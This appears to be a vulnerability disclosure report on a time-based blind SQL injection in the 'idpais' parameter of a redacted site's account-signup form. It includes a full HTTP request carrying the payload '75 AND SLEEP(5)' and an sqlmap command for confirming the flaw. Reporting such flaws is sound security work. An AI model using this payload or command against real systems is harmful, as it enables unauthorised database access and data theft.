URL:

https://tools.redacted.com/en/mybox/new-account/

Description:

The resource doesn’t properly sanitize the “idpais” variable before putting it into a MySQL statement. This results in a Blind SQL Injection vulnerability. We can demonstrate the vulnerability by making the MYSQL server sleep for a while before responding.

Steps to Reproduce:

1) Goto this URL:

https://tools.redacted.com/en/mybox/new-account/

2) Now create an account and notice the “POST” Request and now Request becomes.

3) Vulnerable parameter “idpais” passed in POST , then we insert some Blind SQL commands.

4) Now we Found Time Based Blind SQL.

Request:

POST /en/mybox/finish-new-account/ HTTP/1.1
Host: tools.redacted.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 295
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

langdir=en%2F&mr_mrs=Mr&nombre=dfd&apellidos=fdfsdfd&email=test%40abc.com&idpais=75 AND SLEEP(5)&countryCallingCode=%2B+1&telefono=219923171&nacimiento=1990-05-04&direccion=ffddf+&ciudad=dfdffdf&cp=10005&password=Passwd1&renewPassword=PAsswd1&empr_omitir=on&acept-1=on&accept_marketing=on&accept_profile=on

~The result should come out in around 5 seconds, thereby executing the sleep command.

Manual POC:

SQLMAP POC:

SQLMAP Command: (POST Request)

sqlmap -r request.txt -p idpais